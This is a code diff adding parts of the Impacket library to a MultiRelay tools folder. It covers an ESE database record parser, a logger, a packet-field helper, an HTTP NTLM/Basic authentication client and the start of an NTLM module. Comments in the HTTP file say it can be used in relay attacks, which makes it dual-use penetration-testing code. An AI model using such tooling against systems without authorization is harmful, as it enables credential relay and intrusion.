+                leafHeader = ESENT_LEAF_HEADER(data)
+                leafHeader.dump()
+
+        # Print the leaf/branch tags
+        for tagNum in range(1,self.record['FirstAvailablePageTag']):
+            flags, data = self.getTag(tagNum)
+            if self.record['PageFlags'] & FLAGS_LEAF == 0:
+                # Branch page
+                branchEntry = ESENT_BRANCH_ENTRY(flags, data)
+                branchEntry.dump()
+            elif self.record['PageFlags'] & FLAGS_LEAF > 0:
+                # Leaf page
+                if self.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+                    # Space Tree
+                    spaceTreeEntry = ESENT_SPACE_TREE_ENTRY(data)
+                    #spaceTreeEntry.dump()
+
+                elif self.record['PageFlags'] & FLAGS_INDEX > 0:
+                    # Index Entry
+                    indexEntry = ESENT_INDEX_ENTRY(data)
+                    #indexEntry.dump()
+                elif self.record['PageFlags'] & FLAGS_LONG_VALUE > 0:
+                    # Long Page Value
+                    raise Exception('Long value still not supported')
+                else:
+                    # Table Value
+                    leafEntry = ESENT_LEAF_ENTRY(flags, data)
+                    dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(leafEntry['EntryData'])
+                    dataDefinitionHeader.dump()
+                    catalogEntry = ESENT_CATALOG_DATA_DEFINITION_ENTRY(leafEntry['EntryData'][len(dataDefinitionHeader):])
+                    catalogEntry.dump()
+                    hexdump(leafEntry['EntryData'])
+
+    def getTag(self, tagNum):
+        if self.record['FirstAvailablePageTag'] < tagNum:
+            raise Exception('Trying to grab an unknown tag 0x%x' % tagNum)
+
+        tags = self.data[-4*self.record['FirstAvailablePageTag']:]
+        baseOffset = len(self.record)
+        for i in range(tagNum):
+            tags = tags[:-4]
+
+        tag = tags[-4:]
+
+        if self.__DBHeader['Version'] == 0x620 and self.__DBHeader['FileFormatRevision'] >= 17 and self.__DBHeader['PageSize'] > 8192:
+            valueSize = unpack('<H', tag[:2])[0] & 0x7fff
+            valueOffset = unpack('<H',tag[2:])[0] & 0x7fff
+            tmpData = list(self.data[baseOffset+valueOffset:][:valueSize])
+            pageFlags = ord(tmpData[1]) >> 5
+            tmpData[1] = chr(ord(tmpData[1:2]) & 0x1f)
+            tagData = "".join(tmpData)
+        else:
+            valueSize = unpack('<H', tag[:2])[0] & 0x1fff
+            pageFlags = (unpack('<H', tag[2:])[0] & 0xe000) >> 13
+            valueOffset = unpack('<H',tag[2:])[0] & 0x1fff
+            tagData = self.data[baseOffset+valueOffset:][:valueSize]
+
+        #return pageFlags, self.data[baseOffset+valueOffset:][:valueSize]
+        return pageFlags, tagData
+
+class ESENT_DB:
+    def __init__(self, fileName, pageSize = 8192, isRemote = False):
+        self.__fileName = fileName
+        self.__pageSize = pageSize
+        self.__DB = None
+        self.__DBHeader = None
+        self.__totalPages = None
+        self.__tables = OrderedDict()
+        self.__currentTable = None
+        self.__isRemote = isRemote
+        self.mountDB()
+
+    def mountDB(self):
+        LOG.debug("Mounting DB...")
+        if self.__isRemote is True:
+            self.__DB = self.__fileName
+            self.__DB.open()
+        else:
+            self.__DB = open(self.__fileName,"rb")
+        mainHeader = self.getPage(-1)
+        self.__DBHeader = ESENT_DB_HEADER(mainHeader)
+        self.__pageSize = self.__DBHeader['PageSize']
+        self.__DB.seek(0,2)
+        self.__totalPages = (self.__DB.tell() // self.__pageSize) -2
+        LOG.debug("Database Version:0x%x, Revision:0x%x"% (self.__DBHeader['Version'], self.__DBHeader['FileFormatRevision']))
+        LOG.debug("Page Size: %d" % self.__pageSize)
+        LOG.debug("Total Pages in file: %d" % self.__totalPages)
+        self.parseCatalog(CATALOG_PAGE_NUMBER)
+
+    def printCatalog(self):
+        indent = '    '
+
+        print("Database version: 0x%x, 0x%x" % (self.__DBHeader['Version'], self.__DBHeader['FileFormatRevision'] ))
+        print("Page size: %d " % self.__pageSize)
+        print("Number of pages: %d" % self.__totalPages)
+        print() 
+        print("Catalog for %s" % self.__fileName)
+        for table in list(self.__tables.keys()):
+            print("[%s]" % table.decode('utf8'))
+            print("%sColumns " % indent)
+            for column in list(self.__tables[table]['Columns'].keys()):
+                record = self.__tables[table]['Columns'][column]['Record']
+                print("%s%-5d%-30s%s" % (indent*2, record['Identifier'], column.decode('utf-8'),ColumnTypeToName[record['ColumnType']]))
+            print("%sIndexes"% indent)
+            for index in list(self.__tables[table]['Indexes'].keys()):
+                print("%s%s" % (indent*2, index.decode('utf-8')))
+            print("")
+
+    def __addItem(self, entry):
+        dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(entry['EntryData'])
+        catalogEntry = ESENT_CATALOG_DATA_DEFINITION_ENTRY(entry['EntryData'][len(dataDefinitionHeader):])
+        itemName = self.__parseItemName(entry)
+
+        if catalogEntry['Type'] == CATALOG_TYPE_TABLE:
+            self.__tables[itemName] = OrderedDict()
+            self.__tables[itemName]['TableEntry'] = entry
+            self.__tables[itemName]['Columns']    = OrderedDict()
+            self.__tables[itemName]['Indexes']    = OrderedDict()
+            self.__tables[itemName]['LongValues'] = OrderedDict()
+            self.__currentTable = itemName
+        elif catalogEntry['Type'] == CATALOG_TYPE_COLUMN:
+            self.__tables[self.__currentTable]['Columns'][itemName] = entry
+            self.__tables[self.__currentTable]['Columns'][itemName]['Header'] = dataDefinitionHeader
+            self.__tables[self.__currentTable]['Columns'][itemName]['Record'] = catalogEntry
+        elif catalogEntry['Type'] == CATALOG_TYPE_INDEX:
+            self.__tables[self.__currentTable]['Indexes'][itemName] = entry
+        elif catalogEntry['Type'] == CATALOG_TYPE_LONG_VALUE:
+            self.__addLongValue(entry)
+        else:
+            raise Exception('Unknown type 0x%x' % catalogEntry['Type'])
+
+    def __parseItemName(self,entry):
+        dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(entry['EntryData'])
+
+        if dataDefinitionHeader['LastVariableDataType'] > 127:
+            numEntries =  dataDefinitionHeader['LastVariableDataType'] - 127
+        else:
+            numEntries =  dataDefinitionHeader['LastVariableDataType']
+
+        itemLen = unpack('<H',entry['EntryData'][dataDefinitionHeader['VariableSizeOffset']:][:2])[0]
+        itemName = entry['EntryData'][dataDefinitionHeader['VariableSizeOffset']:][2*numEntries:][:itemLen]
+        return itemName
+
+    def __addLongValue(self, entry):
+        dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(entry['EntryData'])
+        lvLen = unpack('<H',entry['EntryData'][dataDefinitionHeader['VariableSizeOffset']:][:2])[0]
+        lvName = entry['EntryData'][dataDefinitionHeader['VariableSizeOffset']:][7:][:lvLen]
+        self.__tables[self.__currentTable]['LongValues'][lvName] = entry
+
+    def parsePage(self, page):
+        # Print the leaf/branch tags
+        for tagNum in range(1,page.record['FirstAvailablePageTag']):
+            flags, data = page.getTag(tagNum)
+            if page.record['PageFlags'] & FLAGS_LEAF > 0:
+                # Leaf page
+                if page.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+                    pass
+                elif page.record['PageFlags'] & FLAGS_INDEX > 0:
+                    pass
+                elif page.record['PageFlags'] & FLAGS_LONG_VALUE > 0:
+                    pass
+                else:
+                    # Table Value
+                    leafEntry = ESENT_LEAF_ENTRY(flags, data)
+                    self.__addItem(leafEntry)
+
+    def parseCatalog(self, pageNum):
+        # Parse all the pages starting at pageNum and commit table data
+        page = self.getPage(pageNum)
+        self.parsePage(page)
+
+        for i in range(1, page.record['FirstAvailablePageTag']):
+            flags, data = page.getTag(i)
+            if page.record['PageFlags'] & FLAGS_LEAF == 0:
+                # Branch page
+                branchEntry = ESENT_BRANCH_ENTRY(flags, data)
+                self.parseCatalog(branchEntry['ChildPageNumber'])
+
+
+    def readHeader(self):
+        LOG.debug("Reading Boot Sector for %s" % self.__volumeName)
+
+    def getPage(self, pageNum):
+        LOG.debug("Trying to fetch page %d (0x%x)" % (pageNum, (pageNum+1)*self.__pageSize))
+        self.__DB.seek((pageNum+1)*self.__pageSize, 0)
+        data = self.__DB.read(self.__pageSize)
+        while len(data) < self.__pageSize:
+            remaining = self.__pageSize - len(data)
+            data += self.__DB.read(remaining)
+        # Special case for the first page
+        if pageNum <= 0:
+            return data
+        else:
+            return ESENT_PAGE(self.__DBHeader, data)
+
+    def close(self):
+        self.__DB.close()
+
+    def openTable(self, tableName):
+        # Returns a cursos for later use
+
+        if isinstance(tableName, bytes) is not True:
+            tableName = b(tableName)
+
+        if tableName in self.__tables:
+            entry = self.__tables[tableName]['TableEntry']
+            dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(entry['EntryData'])
+            catalogEntry = ESENT_CATALOG_DATA_DEFINITION_ENTRY(entry['EntryData'][len(dataDefinitionHeader):])
+            
+            # Let's position the cursor at the leaf levels for fast reading
+            pageNum = catalogEntry['FatherDataPageNumber']
+            done = False
+            while done is False:
+                page = self.getPage(pageNum)
+                if page.record['FirstAvailablePageTag'] <= 1:
+                    # There are no records
+                    done = True
+                for i in range(1, page.record['FirstAvailablePageTag']):
+                    flags, data = page.getTag(i)
+                    if page.record['PageFlags'] & FLAGS_LEAF == 0:
+                        # Branch page, move on to the next page
+                        branchEntry = ESENT_BRANCH_ENTRY(flags, data)
+                        pageNum = branchEntry['ChildPageNumber']
+                        break
+                    else:
+                        done = True
+                        break
+                
+            cursor = TABLE_CURSOR
+            cursor['TableData'] = self.__tables[tableName]
+            cursor['FatherDataPageNumber'] = catalogEntry['FatherDataPageNumber']
+            cursor['CurrentPageData'] = page
+            cursor['CurrentTag']  = 0
+            return cursor
+        else:
+            return None
+
+    def __getNextTag(self, cursor):
+        page = cursor['CurrentPageData']
+
+        if cursor['CurrentTag'] >= page.record['FirstAvailablePageTag']:
+            # No more data in this page, chau
+            return None
+
+        flags, data = page.getTag(cursor['CurrentTag'])
+        if page.record['PageFlags'] & FLAGS_LEAF > 0:
+            # Leaf page
+            if page.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+                raise Exception('FLAGS_SPACE_TREE > 0')
+            elif page.record['PageFlags'] & FLAGS_INDEX > 0:
+                raise Exception('FLAGS_INDEX > 0')
+            elif page.record['PageFlags'] & FLAGS_LONG_VALUE > 0:
+                raise Exception('FLAGS_LONG_VALUE > 0')
+            else:
+                # Table Value
+                leafEntry = ESENT_LEAF_ENTRY(flags, data)
+                return leafEntry
+
+        return None
+
+    def getNextRow(self, cursor):
+        cursor['CurrentTag'] += 1
+
+        tag = self.__getNextTag(cursor)
+        #hexdump(tag)
+
+        if tag is None:
+            # No more tags in this page, search for the next one on the right
+            page = cursor['CurrentPageData']
+            if page.record['NextPageNumber'] == 0:
+                # No more pages, chau
+                return None
+            else:
+                cursor['CurrentPageData'] = self.getPage(page.record['NextPageNumber'])
+                cursor['CurrentTag'] = 0
+                return self.getNextRow(cursor)
+        else:
+            return self.__tagToRecord(cursor, tag['EntryData'])
+
+    def __tagToRecord(self, cursor, tag):
+        # So my brain doesn't forget, the data record is composed of:
+        # Header
+        # Fixed Size Data (ID < 127)
+        #     The easiest to parse. Their size is fixed in the record. You can get its size
+        #     from the Column Record, field SpaceUsage
+        # Variable Size Data (127 < ID < 255)
+        #     At VariableSizeOffset you get an array of two bytes per variable entry, pointing
+        #     to the length of the value. Values start at:
+        #                numEntries = LastVariableDataType - 127
+        #                VariableSizeOffset + numEntries * 2 (bytes)
+        # Tagged Data ( > 255 )
+        #     After the Variable Size Value, there's more data for the tagged values.
+        #     Right at the beginning there's another array (taggedItems), pointing to the
+        #     values, size.
+        #
+        # The interesting thing about this DB records is there's no need for all the columns to be there, hence
+        # saving space. That's why I got over all the columns, and if I find data (of any type), i assign it. If 
+        # not, the column's empty.
+        #
+        # There are a lot of caveats in the code, so take your time to explore it. 
+        #
+        # ToDo: Better complete this description
+        #
+
+        record = OrderedDict()
+        taggedItems = OrderedDict()
+        taggedItemsParsed = False
+
+        dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(tag)
+        #dataDefinitionHeader.dump()
+        variableDataBytesProcessed = (dataDefinitionHeader['LastVariableDataType'] - 127) * 2
+        prevItemLen = 0
+        tagLen = len(tag)
+        fixedSizeOffset = len(dataDefinitionHeader)
+        variableSizeOffset = dataDefinitionHeader['VariableSizeOffset'] 
+ 
+        columns = cursor['TableData']['Columns'] 
+        
+        for column in list(columns.keys()):
+            columnRecord = columns[column]['Record']
+            #columnRecord.dump()
+            if columnRecord['Identifier'] <= dataDefinitionHeader['LastFixedSize']:
+                # Fixed Size column data type, still available data
+                record[column] = tag[fixedSizeOffset:][:columnRecord['SpaceUsage']]
+                fixedSizeOffset += columnRecord['SpaceUsage']
+
+            elif 127 < columnRecord['Identifier'] <= dataDefinitionHeader['LastVariableDataType']:
+                # Variable data type
+                index = columnRecord['Identifier'] - 127 - 1
+                itemLen = unpack('<H',tag[variableSizeOffset+index*2:][:2])[0]
+
+                if itemLen & 0x8000:
+                    # Empty item
+                    itemLen = prevItemLen
+                    record[column] = None
+                else:
+                    itemValue = tag[variableSizeOffset+variableDataBytesProcessed:][:itemLen-prevItemLen]
+                    record[column] = itemValue
+
+                #if columnRecord['Identifier'] <= dataDefinitionHeader['LastVariableDataType']:
+                variableDataBytesProcessed +=itemLen-prevItemLen
+
+                prevItemLen = itemLen
+
+            elif columnRecord['Identifier'] > 255:
+                # Have we parsed the tagged items already?
+                if taggedItemsParsed is False and (variableDataBytesProcessed+variableSizeOffset) < tagLen:
+                    index = variableDataBytesProcessed+variableSizeOffset
+                    #hexdump(tag[index:])
+                    endOfVS = self.__pageSize
+                    firstOffsetTag = (unpack('<H', tag[index+2:][:2])[0] & 0x3fff) + variableDataBytesProcessed+variableSizeOffset
+                    while True:
+                        taggedIdentifier = unpack('<H', tag[index:][:2])[0]
+                        index += 2
+                        taggedOffset = (unpack('<H', tag[index:][:2])[0] & 0x3fff) 
+                        # As of Windows 7 and later ( version 0x620 revision 0x11) the 
+                        # tagged data type flags are always present
+                        if self.__DBHeader['Version'] == 0x620 and self.__DBHeader['FileFormatRevision'] >= 17 and self.__DBHeader['PageSize'] > 8192: 
+                            flagsPresent = 1
+                        else:
+                            flagsPresent = (unpack('<H', tag[index:][:2])[0] & 0x4000)
+                        index += 2
+                        if taggedOffset < endOfVS:
+                            endOfVS = taggedOffset
+                        taggedItems[taggedIdentifier] = (taggedOffset, tagLen, flagsPresent)
+                        #print "ID: %d, Offset:%d, firstOffset:%d, index:%d, flag: 0x%x" % (taggedIdentifier, taggedOffset,firstOffsetTag,index, flagsPresent)
+                        if index >= firstOffsetTag:
+                            # We reached the end of the variable size array
+                            break
+                
+                    # Calculate length of variable items
+                    # Ugly.. should be redone
+                    prevKey = list(taggedItems.keys())[0]
+                    for i in range(1,len(taggedItems)):
+                        offset0, length, flags = taggedItems[prevKey]
+                        offset, _, _ = list(taggedItems.items())[i][1]
+                        taggedItems[prevKey] = (offset0, offset-offset0, flags)
+                        #print "ID: %d, Offset: %d, Len: %d, flags: %d" % (prevKey, offset0, offset-offset0, flags)
+                        prevKey = list(taggedItems.keys())[i]
+                    taggedItemsParsed = True
+ 
+                # Tagged data type
+                if columnRecord['Identifier'] in taggedItems:
+                    offsetItem = variableDataBytesProcessed + variableSizeOffset + taggedItems[columnRecord['Identifier']][0] 
+                    itemSize = taggedItems[columnRecord['Identifier']][1]
+                    # If item have flags, we should skip them
+                    if taggedItems[columnRecord['Identifier']][2] > 0:
+                        itemFlag = ord(tag[offsetItem:offsetItem+1])
+                        offsetItem += 1
+                        itemSize -= 1
+                    else:
+                        itemFlag = 0
+
+                    #print "ID: %d, itemFlag: 0x%x" %( columnRecord['Identifier'], itemFlag)
+                    if itemFlag & (TAGGED_DATA_TYPE_COMPRESSED ):
+                        LOG.error('Unsupported tag column: %s, flag:0x%x' % (column, itemFlag))
+                        record[column] = None
+                    elif itemFlag & TAGGED_DATA_TYPE_MULTI_VALUE:
+                        # ToDo: Parse multi-values properly
+                        LOG.debug('Multivalue detected in column %s, returning raw results' % (column))
+                        record[column] = (hexlify(tag[offsetItem:][:itemSize]),)
+                    else:
+                        record[column] = tag[offsetItem:][:itemSize]
+
+                else:
+                    record[column] = None
+            else:
+                record[column] = None
+
+            # If we understand the data type, we unpack it and cast it accordingly
+            # otherwise, we just encode it in hex
+            if type(record[column]) is tuple:
+                # A multi value data, we won't decode it, just leave it this way
+                record[column] = record[column][0]
+            elif columnRecord['ColumnType'] == JET_coltypText or columnRecord['ColumnType'] == JET_coltypLongText: 
+                # Let's handle strings
+                if record[column] is not None:
+                    if columnRecord['CodePage'] not in StringCodePages:
+                        raise Exception('Unknown codepage 0x%x'% columnRecord['CodePage'])
+                    stringDecoder = StringCodePages[columnRecord['CodePage']]
+
+                    try:
+                        record[column] = record[column].decode(stringDecoder)
+                    except Exception:
+                        LOG.debug("Exception:", exc_info=True)
+                        LOG.debug('Fixing Record[%r][%d]: %r' % (column, columnRecord['ColumnType'], record[column]))
+                        record[column] = record[column].decode(stringDecoder, "replace")
+                        pass
+            else:
+                unpackData = ColumnTypeSize[columnRecord['ColumnType']]
+                if record[column] is not None:
+                    if unpackData is None:
+                        record[column] = hexlify(record[column])
+                    else:
+                        unpackStr = unpackData[1]
+                        record[column] = unpack(unpackStr, record[column])[0]
+
+        return record

tools/MultiRelay/impacket-dev/impacket/examples/__init__.py

@@ -0,0 +1 @@
+pass

tools/MultiRelay/impacket-dev/impacket/examples/logger.py

@@ -0,0 +1,59 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description: This logger is intended to be used by impacket instead
+# of printing directly. This will allow other libraries to use their
+# custom logging implementation.
+#
+
+import logging
+import sys
+
+# This module can be used by scripts using the Impacket library 
+# in order to configure the root logger to output events 
+# generated by the library with a predefined format
+
+# If the scripts want to generate log entries, they can write
+# directly to the root logger (logging.info, debug, etc).
+
+class ImpacketFormatter(logging.Formatter):
+  '''
+  Prefixing logged messages through the custom attribute 'bullet'.
+  '''
+  def __init__(self):
+      logging.Formatter.__init__(self,'%(bullet)s %(message)s', None)
+
+  def format(self, record):
+    if record.levelno == logging.INFO:
+      record.bullet = '[*]'
+    elif record.levelno == logging.DEBUG:
+      record.bullet = '[+]'
+    elif record.levelno == logging.WARNING:
+      record.bullet = '[!]'
+    else:
+      record.bullet = '[-]'
+
+    return logging.Formatter.format(self, record)
+
+class ImpacketFormatterTimeStamp(ImpacketFormatter):
+  '''
+  Prefixing logged messages through the custom attribute 'bullet'.
+  '''
+  def __init__(self):
+      logging.Formatter.__init__(self,'[%(asctime)-15s] %(bullet)s %(message)s', None)
+
+  def formatTime(self, record, datefmt=None):
+      return ImpacketFormatter.formatTime(self, record, datefmt="%Y-%m-%d %H:%M:%S")
+
+def init(ts=False):
+    # We add a StreamHandler and formatter to the root logger
+    handler = logging.StreamHandler(sys.stdout)
+    if not ts:
+        handler.setFormatter(ImpacketFormatter())
+    else:
+        handler.setFormatter(ImpacketFormatterTimeStamp())
+    logging.getLogger().addHandler(handler)
+    logging.getLogger().setLevel(logging.INFO)

tools/MultiRelay/impacket-dev/impacket/helper.py

@@ -0,0 +1,150 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#  Helper used to build ProtocolPackets
+#
+# Author:
+# Aureliano Calvo
+
+
+import struct
+import functools
+from six import add_metaclass
+
+import impacket.ImpactPacket as ip
+
+
+def rebind(f):
+    functools.wraps(f)
+    def rebinder(*args, **kwargs):
+        return f(*args, **kwargs)
+        
+    return rebinder
+
+class Field(object):
+    def __init__(self, index):
+        self.index = index
+    
+    def __call__(self, k, d):
+        getter = rebind(self.getter)
+        getter_name = "get_" + k
+        getter.__name__ = getter_name
+        getter.__doc__ = "Get the %s field" % k
+        d[getter_name] = getter
+        
+        setter = rebind(self.setter)
+        setter_name = "set_" + k
+        setter.__name__ = setter_name
+        setter.__doc__ = "Set the %s field" % k
+        d["set_" + k] = setter
+        
+        d[k] = property(getter, setter, doc="%s property" % k)
+        
+class Bit(Field):
+    def __init__(self, index, bit_number):
+        Field.__init__(self, index)
+        self.mask = 2 ** bit_number
+        self.off_mask = (~self.mask) & 0xff
+        
+    def getter(self, o):
+        return (o.header.get_byte(self.index) & self.mask) != 0
+    
+    def setter(self, o, value=True):
+        b = o.header.get_byte(self.index)
+        if value:
+            b |= self.mask
+        else:
+            b &= self.off_mask
+        
+        o.header.set_byte(self.index, b) 
+
+class Byte(Field):
+    
+    def __init__(self, index):
+        Field.__init__(self, index)
+        
+    def getter(self, o):
+        return o.header.get_byte(self.index)
+    
+    def setter(self, o, value):
+        o.header.set_byte(self.index, value)
+        
+class Word(Field):
+    def __init__(self, index, order="!"):
+        Field.__init__(self, index)
+        self.order = order
+        
+    def getter(self, o):
+        return o.header.get_word(self.index, self.order)
+    
+    def setter(self, o, value):
+        o.header.set_word(self.index, value, self.order)
+
+class Long(Field):        
+    def __init__(self, index, order="!"):
+        Field.__init__(self, index)        
+        self.order = order
+        
+    def getter(self, o):
+        return o.header.get_long(self.index, self.order)
+    
+    def setter(self, o, value):
+        o.header.set_long(self.index, value, self.order)
+        
+class ThreeBytesBigEndian(Field):
+    def __init__(self, index):
+        Field.__init__(self, index)
+                
+    def getter(self, o):
+        b=o.header.get_bytes()[self.index:self.index+3].tostring()
+        #unpack requires a string argument of length 4 and b is 3 bytes long
+        (value,)=struct.unpack('!L', b'\x00'+b)
+        return value
+
+    def setter(self, o, value):
+        # clear the bits
+        mask = ((~0xFFFFFF00) & 0xFF)
+        masked = o.header.get_long(self.index, ">") & mask
+        # set the bits 
+        nb = masked | ((value & 0x00FFFFFF) << 8)
+        o.header.set_long(self.index, nb, ">")
+
+
+class ProtocolPacketMetaklass(type):
+    def __new__(cls, name, bases, d):
+        d["_fields"] = []
+        items = list(d.items())
+        if not object in bases:
+            bases += (object,)
+        for k,v in items:
+            if isinstance(v, Field):
+                d["_fields"].append(k) 
+                v(k, d)
+                
+        d["_fields"].sort()
+        
+        def _fields_repr(self):
+            return " ".join( "%s:%s" % (f, repr(getattr(self, f))) for f in self._fields )
+        def __repr__(self):
+            
+            return "<%(name)s %(fields)s \nchild:%(r_child)s>" % {
+                "name": name,
+                "fields": self._fields_repr(),
+                "r_child": repr(self.child()), 
+            }
+        
+        d["_fields_repr"] = _fields_repr
+        d["__repr__"] = __repr__
+        
+        return type.__new__(cls, name, bases, d)
+
+@add_metaclass(ProtocolPacketMetaklass)
+class ProtocolPacket(ip.ProtocolPacket):
+    def __init__(self, buff = None):
+        ip.ProtocolPacket.__init__(self, self.header_size, self.tail_size)
+        if buff:
+            self.load_packet(buff)

tools/MultiRelay/impacket-dev/impacket/http.py

@@ -0,0 +1,206 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+# Description:
+#  For MS-RPCH
+#  Can be programmed to be used in relay attacks
+#
+# Probably for future MAPI
+
+import re
+import ssl
+import base64
+import binascii
+
+try:
+    from http.client import HTTPConnection, HTTPSConnection
+except ImportError:
+    from httplib import HTTPConnection, HTTPSConnection
+
+from impacket import ntlm, LOG
+
+# Auth types
+AUTH_AUTO      = 'Auto'
+AUTH_BASIC     = 'Basic'
+AUTH_NTLM      = 'NTLM'
+AUTH_NEGOTIATE = 'Negotiate'
+AUTH_BEARER    = 'Bearer'
+AUTH_DIGEST    = 'Digest'
+
+################################################################################
+# CLASSES
+################################################################################
+class HTTPClientSecurityProvider:
+    def __init__(self, auth_type=AUTH_AUTO):
+        self.__username = None
+        self.__password = None
+        self.__domain   = None
+        self.__lmhash   = ''
+        self.__nthash   = ''
+        self.__aesKey   = ''
+        self.__TGT      = None
+        self.__TGS      = None
+
+        self.__auth_type = auth_type
+
+        self.__auth_types = []
+        self.__ntlmssp_info = None
+
+    def set_auth_type(self, auth_type):
+        self.__auth_type = auth_type
+
+    def get_auth_type(self):
+        return self.__auth_type
+
+    def get_auth_types(self):
+        return self.__auth_types
+
+    def get_ntlmssp_info(self):
+        return self.__ntlmssp_info
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        self.__username = username
+        self.__password = password
+        self.__domain   = domain
+
+        if lmhash != '' or nthash != '':
+            if len(lmhash) % 2:
+                lmhash = '0%s' % lmhash
+            if len(nthash) % 2:
+                nthash = '0%s' % nthash
+
+            try: # just in case they were converted already
+                self.__lmhash = binascii.unhexlify(lmhash)
+                self.__nthash = binascii.unhexlify(nthash)
+            except:
+                self.__lmhash = lmhash
+                self.__nthash = nthash
+                pass
+
+        self.__aesKey = aesKey
+        self.__TGT    = TGT
+        self.__TGS    = TGS
+
+    def parse_www_authenticate(self, header):
+        ret = []
+
+        if 'NTLM' in header:
+            ret.append(AUTH_NTLM)
+        if 'Basic' in header:
+            ret.append(AUTH_BASIC)
+        if 'Negotiate' in header:
+            ret.append(AUTH_NEGOTIATE)
+        if 'Bearer' in header:
+            ret.append(AUTH_BEARER)
+        if 'Digest' in header:
+            ret.append(AUTH_DIGEST)
+
+        return ret
+
+    def connect(self, protocol, host_L6):
+        if protocol == 'http':
+            return HTTPConnection(host_L6)
+        else:
+            try:
+                uv_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+                return HTTPSConnection(host_L6, context=uv_context)
+            except AttributeError:
+                return HTTPSConnection(host_L6)
+
+    def get_auth_headers(self, http_obj, method, path, headers):
+        if self.__auth_type == AUTH_BASIC:
+            return self.get_auth_headers_basic(http_obj, method, path, headers)
+        elif self.__auth_type in [AUTH_AUTO, AUTH_NTLM]:
+            return self.get_auth_headers_auto(http_obj, method, path, headers)
+        else:
+            raise Exception('%s auth type not supported' % self.__auth_type)
+
+    def get_auth_headers_basic(self, http_obj, method, path, headers):
+        if self.__lmhash != '' or self.__nthash != '' or \
+           self.__aesKey != '' or self.__TGT != None or self.__TGS != None:
+            raise Exception('Basic authentication in HTTP connection used, '
+                            'so set a plaintext credentials to connect.')
+
+        if self.__domain == '':
+            auth_line = self.__username + ':' + self.__password
+        else:
+            auth_line = self.__domain + '\\' + self.__username + ':' + self.__password
+
+        auth_line_http = 'Basic %s' % base64.b64encode(auth_line.encode('UTF-8')).decode('ascii')
+
+        # Format: auth_headers, reserved, ...
+        return {'Authorization': auth_line_http}, None
+
+    # It's important that the class contains the separate method that
+    # gets NTLM Type 1 value, as this way the class can be programmed to
+    # be used in relay attacks
+    def send_ntlm_type1(self, http_obj, method, path, headers, negotiateMessage):
+        auth_headers = headers.copy()
+        auth_headers['Content-Length'] = '0'
+        auth_headers['Authorization']  = 'NTLM %s' % base64.b64encode(negotiateMessage).decode('ascii')
+        http_obj.request(method, path, headers=auth_headers)
+        res = http_obj.getresponse()
+        res.read()
+
+        if res.status != 401:
+            raise Exception('Status code returned: %d. '
+                            'Authentication does not seem required for url %s'
+                            % (res.status, path)
+                )
+
+        if res.getheader('WWW-Authenticate') is None:
+           raise Exception('No authentication requested by '
+                           'the server for url %s' % path)
+
+        if self.__auth_types == []:
+            self.__auth_types = self.parse_www_authenticate(res.getheader('WWW-Authenticate'))
+
+        if AUTH_NTLM not in self.__auth_types:
+            # NTLM auth not supported for url
+            return None, None
+
+        try:
+            serverChallengeBase64 = re.search('NTLM ([a-zA-Z0-9+/]+={0,2})',
+                                              res.getheader('WWW-Authenticate')).group(1)
+            serverChallenge = base64.b64decode(serverChallengeBase64)
+        except (IndexError, KeyError, AttributeError):
+            raise Exception('No NTLM challenge returned from server for url %s' % path)
+
+        if not self.__ntlmssp_info:
+            challenge = ntlm.NTLMAuthChallenge(serverChallenge)
+            self.__ntlmssp_info = ntlm.AV_PAIRS(challenge['TargetInfoFields'])
+
+        # Format: serverChallenge, reserved, ...
+        return serverChallenge, None
+
+    def get_auth_headers_auto(self, http_obj, method, path, headers):
+        if self.__aesKey != '' or self.__TGT != None or self.__TGS != None:
+            raise Exception('NTLM authentication in HTTP connection used, ' \
+                            'cannot use Kerberos.')
+
+        auth = ntlm.getNTLMSSPType1(domain=self.__domain)
+        serverChallenge = self.send_ntlm_type1(http_obj, method, path, headers, auth.getData())[0]
+
+        if serverChallenge is not None:
+            self.__auth_type = AUTH_NTLM
+
+            type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, serverChallenge, self.__username,
+                                                             self.__password, self.__domain,
+                                                             self.__lmhash, self.__nthash)
+
+            auth_line_http = 'NTLM %s' % base64.b64encode(type3.getData()).decode('ascii')
+        else:
+            if self.__auth_type == AUTH_AUTO and AUTH_BASIC in self.__auth_types:
+                self.__auth_type = AUTH_BASIC
+                return self.get_auth_headers_basic(http_obj, method, path, headers)
+            else:
+                raise Exception('No supported auth offered by URL: %s' % self.__auth_types)
+
+        # Format: auth_headers, reserved, ...
+        return {'Authorization': auth_line_http}, None

tools/MultiRelay/impacket-dev/impacket/ntlm.py

@@ -0,0 +1,976 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+from __future__ import division
+from __future__ import print_function
+import base64
+import struct
+import calendar
+import time
+import hashlib
+import random
+import string
+import binascii
+from six import b
+
+from impacket.structure import Structure
+from impacket import LOG
+
+
+# This is important. NTLMv2 is not negotiated by the client or server. 
+# It is used if set locally on both sides. Change this item if you don't want to use 
+# NTLMv2 by default and fall back to NTLMv1 (with EXTENDED_SESSION_SECURITY or not)
+# Check the following links:
+# https://davenport.sourceforge.io/ntlm.html
